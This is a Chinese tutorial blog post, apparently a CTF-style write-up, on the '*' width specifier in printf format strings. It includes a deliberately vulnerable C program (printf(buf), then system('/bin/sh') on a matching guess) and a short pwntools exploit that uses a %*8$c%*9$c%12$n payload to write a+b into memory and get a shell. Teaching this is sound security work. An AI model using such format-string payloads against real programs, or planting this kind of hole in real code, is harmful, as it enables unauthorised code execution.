格式化字符串中的占位符特殊用法

*号的用法

*在printf里可以代表一个泛整数,可以代表任何整数。它可以出现在位宽的位置,也可以出现在小数位数的位置。

对于下面这个程序

#include<stdio.h>
int main(){
	float a = 3.14;
	printf("num:%*.2f",6,a);
}

它的输出是

num:  3.14

也就是%*.2f这个格式化参数在输出时一共占了6个字符大小。

那么下面给出一道例题

//gcc -o test test.c -no-pie -g
#include<stdio.h>
#include<unistd.h>
#include<fcntl.h>
#include <stdlib.h>
long long num=0;
int main(){
	char buf[0x18];
	long long a=0;
	long long b=0;
	int fp = open("/dev/urandom",O_RDONLY);
	read(fp,&a,2);
	read(fp,&b,2);
	close(fp);
	puts("your name:");
	read(0,buf,0x18);
	puts("guess a number:");
	scanf("%lld",&num);
	printf(buf);
	
	if(a+b==num){
		puts("win!");
		system("/bin/sh");	
	}else{
		puts("wrong!");
		exit(0);
	}
}

不考虑爆破的情况,这里虽然可以通过格式化字符串泄露这两个值,但是这里只能先猜,所以这里用*来修改内存,先输出a、b两个数的宽度再用%n写入num,达到num=a+b的效果。

栈上情况

在这里插入图片描述

exp

from pwn import*
p = process('./test')
num_addr = 0x601078
payload = '%*8$c%*9$c%12$n'.ljust(0x10,'a')+p64(num_addr)
p.sendafter('\n',payload)
p.sendlineafter('\n','0')
p.interactive()
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值